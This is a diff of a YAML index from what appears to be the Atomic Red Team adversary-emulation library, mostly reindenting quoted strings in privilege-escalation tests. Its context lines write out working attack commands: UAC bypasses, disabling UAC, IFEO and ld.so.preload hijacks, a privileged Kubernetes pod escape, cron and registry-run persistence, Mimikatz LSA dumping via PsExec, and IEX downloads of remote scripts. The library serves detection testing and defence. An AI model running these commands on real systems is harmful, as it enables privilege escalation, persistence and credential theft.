@@ -10424,7 +10424,7 @@ privilege-escalation:
           cmd.exe /c eventvwr.msc
         cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Bypass UAC using Event Viewer (PowerShell)
       auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b
@@ -10446,7 +10446,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
           -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Bypass UAC using Fodhelper
       auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182
@@ -10468,7 +10468,7 @@ privilege-escalation:
         cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul
           2>&1
 
-'
+          '
         name: command_prompt
     - name: Bypass UAC using Fodhelper - PowerShell
       auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa
@@ -10491,7 +10491,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
           -Recurse -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Bypass UAC using ComputerDefaults (PowerShell)
       auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f
@@ -10514,7 +10514,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force
           -Recurse -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Bypass UAC by Mocking Trusted Directories
@@ -10562,7 +10562,7 @@ privilege-escalation:
         cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse
           -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: Disable UAC using reg.exe
       auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9
@@ -10575,11 +10575,11 @@ privilege-escalation:
         command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
           /v EnableLUA /t REG_DWORD /d 0 /f
 
-'
+          '
         cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
           /v EnableLUA /t REG_DWORD /d 1 /f
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Bypass UAC using SilentCleanup task
@@ -10716,7 +10716,7 @@ privilege-escalation:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -10761,7 +10761,7 @@ privilege-escalation:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -10799,7 +10799,7 @@ privilege-escalation:
       - description: "#{file_name} must be present\n"
         prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
@@ -10916,10 +10916,10 @@ privilege-escalation:
       executor:
         command: 'assoc #{extension_to_change}=#{target_extension_handler}
 
-'
+          '
         cleanup_command: 'assoc  #{extension_to_change}=#{original_extension_handler}
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1078.004:
@@ -11120,7 +11120,7 @@ privilege-escalation:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-'
+        '
       supported_platforms:
       - containers
       input_arguments:
@@ -11131,17 +11131,17 @@ privilege-escalation:
       dependencies:
       - description: 'kubectl must be installed
 
-'
+          '
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-'
+          '
         prereq_command: 'which kubectl
 
-'
+          '
       executor:
         command: 'kubectl get cronjobs -n #{namespace}
 
-'
+          '
         name: bash
         elevation_required: false
     - name: CreateCronjob
@@ -11153,7 +11153,7 @@ privilege-escalation:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-'
+        '
       supported_platforms:
       - containers
       input_arguments:
@@ -11164,20 +11164,20 @@ privilege-escalation:
       dependencies:
       - description: 'kubectl must be installed
 
-'
+          '
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-'
+          '
         prereq_command: 'which kubectl
 
-'
+          '
       executor:
         command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
 
-'
+          '
         cleanup_command: 'kubectl delete cronjob art -n #{namespace}
 
-'
+          '
         name: bash
         elevation_required: false
   T1134.002:
@@ -11357,7 +11357,7 @@ privilege-escalation:
         of the referenced file. This technique was used by numerous IoT automated
         exploitation attacks.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -11377,7 +11377,7 @@ privilege-escalation:
           echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
         cleanup_command: 'crontab /tmp/notevil
 
-'
+          '
     - name: Cron - Add script to all cron subfolders
       auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
       description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -11385,7 +11385,7 @@ privilege-escalation:
         schedule. This technique was used by the threat actor Rocke during the exploitation
         of Linux web servers.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -11417,7 +11417,7 @@ privilege-escalation:
         to execute on a schedule. This technique was used by the threat actor Rocke
         during the exploitation of Linux web servers.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -11434,10 +11434,10 @@ privilege-escalation:
         name: bash
         command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
 
-'
+          '
         cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
 
-'
+          '
   T1574.001:
     technique:
       id: attack-pattern--2fee9321-3e71-4cf4-af24-d4d40d355b34
@@ -11612,10 +11612,10 @@ privilege-escalation:
       dependencies:
       - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable})
 
-'
+          '
         prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}"
@@ -11623,7 +11623,7 @@ privilege-escalation:
         command: "#{gup_executable}\n"
         cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1
 
-'
+          '
         name: command_prompt
   T1078.001:
     technique:
@@ -11735,16 +11735,16 @@ privilege-escalation:
       description: 'The Adversaries can activate the default Guest user. The guest
         account is inactivated by default
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'net user guest /active:yes
 
-'
+          '
         cleanup_command: 'net user guest /active:no
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1078.002:
@@ -12185,21 +12185,21 @@ privilege-escalation:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-'
+          '
         prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-'
+          '
       executor:
         command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload''
 
-'
+          '
         cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload
 
-'
+          '
         name: bash
         elevation_required: true
     - name: Shared Library Injection via LD_PRELOAD
@@ -12224,18 +12224,18 @@ privilege-escalation:
       - description: 'The shared library must exist on disk at specified location
           (#{path_to_shared_library})
 
-'
+          '
         prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
 
-'
+          '
       executor:
         command: 'LD_PRELOAD=#{path_to_shared_library} ls
 
-'
+          '
         name: bash
   T1055.001:
     technique:
@@ -12335,10 +12335,10 @@ privilege-escalation:
       dependencies:
       - description: 'Utility to inject must exist on disk at specified location (#{dll_payload})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}"
@@ -12484,7 +12484,7 @@ privilege-escalation:
       description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor)
         daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -12582,24 +12582,24 @@ privilege-escalation:
       - description: Verify docker is installed.
         prereq_command: 'which docker
 
-'
+          '
         get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
           Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
           ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
           echo "Docker installed"; fi
 
-'
+          '
       - description: Verify docker service is running.
         prereq_command: 'sudo systemctl status docker
 
-'
+          '
         get_prereq_command: 'sudo systemctl start docker
 
-'
+          '
       - description: Verify kind is in the path.
         prereq_command: 'which kind
 
-'
+          '
         get_prereq_command: |
           curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
           chmod +x ./kind
@@ -12607,14 +12607,14 @@ privilege-escalation:
       - description: Verify kind-atomic-cluster is created
         prereq_command: 'sudo kind get clusters
 
-'
+          '
         get_prereq_command: 'sudo kind create cluster --name atomic-cluster
 
-'
+          '
       - description: Verify kubectl is in path
         prereq_command: 'which kubectl
 
-'
+          '
         get_prereq_command: |
           curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
           chmod +x ./kubectl
@@ -12625,11 +12625,11 @@ privilege-escalation:
           true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
           true,"tty":true,"securityContext":{"privileged":true}}]}}''
 
-'
+          '
         name: sh
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 
-'
+          '
   T1546:
     technique:
       id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db
@@ -13173,7 +13173,7 @@ privilege-escalation:
       auto_generated_guid: fdda2626-5234-4c90-b163-60849a24c0b8
       description: 'Leverage Global Flags Settings
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -13189,19 +13189,19 @@ privilege-escalation:
         command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
           File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
 
-'
+          '
         cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
           NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger
           /f >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: IFEO Global Flags
       auto_generated_guid: 46b1f278-c8ee-4aa5-acce-65e77b11f3c1
       description: 'Leverage Global Flags Settings
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -13337,7 +13337,7 @@ privilege-escalation:
       description: 'This test uses the insmod command to load a kernel module for
         Linux.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -13361,10 +13361,10 @@ privilege-escalation:
       dependencies:
       - description: 'The kernel module must exist on disk at specified location
 
-'
+          '
         prereq_command: 'if [ -f #{module_path} ]; then exit 0; else exit 1; fi;
 
-'
+          '
         get_prereq_command: |
           if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;
           cp #{module_source_path}/* #{temp_folder}/
@@ -13373,7 +13373,7 @@ privilege-escalation:
       executor:
         command: 'sudo insmod #{module_path}
 
-'
+          '
         cleanup_command: |
           sudo rmmod #{module_name}
           [ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}
@@ -13579,7 +13579,7 @@ privilege-escalation:
       auto_generated_guid: a5983dee-bf6c-4eaf-951c-dbc1a7b90900
       description: 'Create a plist and execute it
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -13596,15 +13596,15 @@ privilege-escalation:
       - description: 'The shared library must exist on disk at specified location
           (#{path_malicious_plist})
 
-'
+          '
         prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'echo "The shared library doesn''t exist. Check the path";
           exit 1;
 
-'
+          '
       executor:
         name: bash
         elevation_required: true
@@ -13698,7 +13698,7 @@ privilege-escalation:
       auto_generated_guid: 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf
       description: 'Utilize LaunchDaemon to launch `Hello World`
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -13715,15 +13715,15 @@ privilege-escalation:
       - description: 'The shared library must exist on disk at specified location
           (#{path_malicious_plist})
 
-'
+          '
         prereq_command: 'if [ -f #{path_malicious_plist} ]; then exit 0; else exit
           1; fi;
 
-'
+          '
         get_prereq_command: 'echo "The plist file doesn''t exist. Check the path and
           try again."; exit 1;
 
-'
+          '
       executor:
         name: bash
         elevation_required: true
@@ -13943,7 +13943,7 @@ privilege-escalation:
       auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4
       description: 'Mac logon script
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -14141,7 +14141,7 @@ privilege-escalation:
       description: 'Netsh interacts with other operating system components using dynamic-link
         library (DLL) files
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -14152,7 +14152,7 @@ privilege-escalation:
       executor:
         command: 'netsh.exe add helper #{helper_file}
 
-'
+          '
         name: command_prompt
   T1037.003:
     technique:
@@ -14314,10 +14314,10 @@ privilege-escalation:
       dependencies:
       - description: 'DLL to inject must exist on disk at specified location (#{dll_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
@@ -14358,7 +14358,7 @@ privilege-escalation:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
           ''#{command_line}'' -ParentId #{parent_pid}'
@@ -14387,7 +14387,7 @@ privilege-escalation:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Start-ATHProcessUnderSpecificParent  -ParentId #{parent_pid} -TestGuid
           #{test_guid}'
@@ -14417,7 +14417,7 @@ privilege-escalation:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
           ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
@@ -14453,7 +14453,7 @@ privilege-escalation:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
           -FilePath #{file_path} -CommandLine ''#{command_line}'''
@@ -14863,7 +14863,7 @@ privilege-escalation:
       auto_generated_guid: 394a538e-09bb-4a4a-95d1-b93cf12682a8
       description: 'Modify MacOS plist file in one of two directories
 
-'
+        '
       supported_platforms:
       - macos
       executor:
@@ -14964,10 +14964,10 @@ privilege-escalation:
         command: 'reg add "hklm\system\currentcontrolset\control\print\monitors\ART"
           /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
 
-'
+          '
         cleanup_command: 'reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
 
-'
+          '
         name: command_prompt
         elevation_required: true
   T1055.002:
@@ -15115,7 +15115,7 @@ privilege-escalation:
         profile pofile that points to a malicious executable. Upon execution, calc.exe
         will be launched.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -15131,13 +15131,13 @@ privilege-escalation:
       dependencies:
       - description: 'Ensure a powershell profile exists for the current user
 
-'
+          '
         prereq_command: 'if (Test-Path #{ps_profile}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'New-Item -Path #{ps_profile} -Type File -Force
 
-'
+          '
       executor:
         command: |
           Add-Content #{ps_profile} -Value ""
@@ -15484,13 +15484,13 @@ privilege-escalation:
         cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction
           Ignore
 
-'
+          '
         name: powershell
     - name: RunPE via VBA
       auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b
       description: 'This module executes notepad.exe from within the WINWORD.EXE process
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -15502,7 +15502,7 @@ privilege-escalation:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -15513,7 +15513,7 @@ privilege-escalation:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -15636,7 +15636,7 @@ privilege-escalation:
       dependencies:
       - description: 'The 64-bit version of Microsoft Office must be installed
 
-'
+          '
         prereq_command: |
           try {
             $wdApp = New-Object -COMObject "Word.Application"
@@ -15647,7 +15647,7 @@ privilege-escalation:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -15682,7 +15682,7 @@ privilege-escalation:
       - description: 'Mimikatz executor must exist on disk and at specified location
           (#{mimikatz_path})
 
-'
+          '
         prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -15696,10 +15696,10 @@ privilege-escalation:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_path})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
 
-'
+          '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
@@ -15710,7 +15710,7 @@ privilege-escalation:
         command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa
           /inject /id:500" "exit"
 
-'
+          '
         name: command_prompt
         elevation_required: false
   T1055.008:
@@ -15887,14 +15887,14 @@ privilege-escalation:
         command: 'sudo echo osascript -e ''tell app "Finder" to display dialog "Hello
           World"'' >> /etc/rc.common
 
-'
+          '
         elevation_required: true
         name: bash
     - name: rc.common
       auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a
       description: 'Modify rc.common
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -15910,12 +15910,12 @@ privilege-escalation:
           ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
           && sudo rm $origfilename;fi
 
-'
+          '
     - name: rc.local
       auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
       description: 'Modify rc.local
 
-'
+        '
       supported_platforms:
       - linux
       executor:
@@ -15931,7 +15931,7 @@ privilege-escalation:
           ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
           sudo rm $origfilename;fi
 
-'
+          '
   T1547.007:
     technique:
       created: '2020-01-24T18:15:06.641Z'
@@ -16013,10 +16013,10 @@ privilege-escalation:
       executor:
         command: 'sudo defaults write com.apple.loginwindow LoginHook #{script}
 
-'
+          '
         cleanup_command: 'sudo defaults delete com.apple.loginwindow LoginHook
 
-'
+          '
         elevation_required: true
         name: sh
   T1547.001:
@@ -16142,11 +16142,11 @@ privilege-escalation:
         command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
           "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
 
-'
+          '
         cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
           /V "Atomic Red Team" /f >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Reg Key RunOnce
       auto_generated_guid: 554cbd88-cde1-4b56-8168-0be552eed9eb
@@ -16164,11 +16164,11 @@ privilege-escalation:
         command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
           /v 1 /d "#{thing_to_execute}"
 
-'
+          '
         cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend
           /v 1 /f >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: PowerShell Registry RunOnce
@@ -16194,7 +16194,7 @@ privilege-escalation:
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
-'
+          '
         name: powershell
         elevation_required: true
     - name: Suspicious vbs file run from startup Folder
@@ -16435,7 +16435,7 @@ privilege-escalation:
       description: 'Upon successful execution, cmd.exe will create a scheduled task
         to spawn cmd.exe at 20:10.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -16452,10 +16452,10 @@ privilege-escalation:
         elevation_required: false
         command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
 
-'
+          '
         cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
 
-'
+          '
     - name: Scheduled task Remote
       auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
       description: |
@@ -16491,11 +16491,11 @@ privilege-escalation:
         command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
           "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
-'
+          '
         cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
           /TN "Atomic task" /F >nul 2>&1
 
-'
+          '
     - name: Powershell Cmdlet Scheduled Task
       auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
       description: |
@@ -16517,7 +16517,7 @@ privilege-escalation:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
           >$null 2>&1
 
-'
+          '
     - name: Task Scheduler via VBA
       auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
       description: |
@@ -16534,7 +16534,7 @@ privilege-escalation:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -16545,7 +16545,7 @@ privilege-escalation:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -16558,7 +16558,7 @@ privilege-escalation:
         login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
         as Register-ScheduledTask cmdlet behind the scenes.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -16570,7 +16570,7 @@ privilege-escalation:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
           >$null 2>&1
 
-'
+          '
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -16706,7 +16706,7 @@ privilege-escalation:
         sets it as the screensaver so it will execute for persistence. Requires a
         reboot and logon.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -16963,7 +16963,7 @@ privilege-escalation:
       description: 'Change Service registry ImagePath of a bengin service to a malicious
         file
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -16983,22 +16983,22 @@ privilege-escalation:
       dependencies:
       - description: 'The service must exist (#{weak_service_name})
 
-'
+          '
         prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit
           1}
 
-'
+          '
         get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}"
 
-'
+          '
       executor:
         command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}"
           /f /v ImagePath /d "#{malicious_service_path}"
 
-'
+          '
         cleanup_command: 'sc.exe delete #{weak_service_name}
 
-'
+          '
         name: command_prompt
   T1548.001:
     technique:
@@ -17054,7 +17054,7 @@ privilege-escalation:
       description: 'Make, change owner, and change file attributes on a C source code
         file
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -17080,7 +17080,7 @@ privilege-escalation:
       auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79
       description: 'This test sets the SetUID flag on a file in Linux and macOS.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -17096,14 +17096,14 @@ privilege-escalation:
           sudo chmod u+s #{file_to_setuid}
         cleanup_command: 'sudo rm #{file_to_setuid}
 
-'
+          '
         name: sh
         elevation_required: true
     - name: Set a SetGID flag on file
       auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c
       description: 'This test sets the SetGID flag on a file in Linux and macOS.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -17119,7 +17119,7 @@ privilege-escalation:
           sudo chmod g+s #{file_to_setuid}
         cleanup_command: 'sudo rm #{file_to_setuid}
 
-'
+          '
         name: sh
         elevation_required: true
   T1547.009:
@@ -17193,7 +17193,7 @@ privilege-escalation:
           #{shortcut_file_path}
         cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Create shortcut to cmd in startup folders
       auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
@@ -17294,10 +17294,10 @@ privilege-escalation:
       executor:
         command: 'sudo touch /Library/StartupItems/EvilStartup.plist
 
-'
+          '
         cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist
 
-'
+          '
         name: sh
         elevation_required: true
   T1548.003:
@@ -17365,7 +17365,7 @@ privilege-escalation:
       auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e
       description: 'Common Sudo enumeration methods.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -17379,7 +17379,7 @@ privilege-escalation:
         This is dangerous to modify without using ''visudo'', do not do this on a
         production system.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -17394,7 +17394,7 @@ privilege-escalation:
       description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous
         to modify without using ''visudo'', do not do this on a production system.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -17500,7 +17500,7 @@ privilege-escalation:
       description: 'This test creates a Systemd service unit file and enables it as
         a service.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -17573,15 +17573,15 @@ privilege-escalation:
       dependencies:
       - description: 'System must be Ubuntu ,Kali OR CentOS.
 
-'
+          '
         prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
           /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
           ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
 
-'
+          '
         get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
 
-'
+          '
       executor:
         name: bash
         elevation_required: true
@@ -18188,7 +18188,7 @@ privilege-escalation:
       auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f
       description: 'Adds a command to the .bash_profile file of the current user
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -18200,13 +18200,13 @@ privilege-escalation:
       executor:
         command: 'echo "#{command_to_add}" >> ~/.bash_profile
 
-'
+          '
         name: sh
     - name: Add command to .bashrc
       auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
       description: 'Adds a command to the .bashrc file of the current user
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -18218,7 +18218,7 @@ privilege-escalation:
       executor:
         command: 'echo "#{command_to_add}" >> ~/.bashrc
 
-'
+          '
         name: sh
   T1055.014:
     technique:
@@ -18653,10 +18653,10 @@ privilege-escalation:
       dependencies:
       - description: 'Service binary must exist on disk at specified location (#{binary_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{binary_path}) {exit 0} else {exit 1}
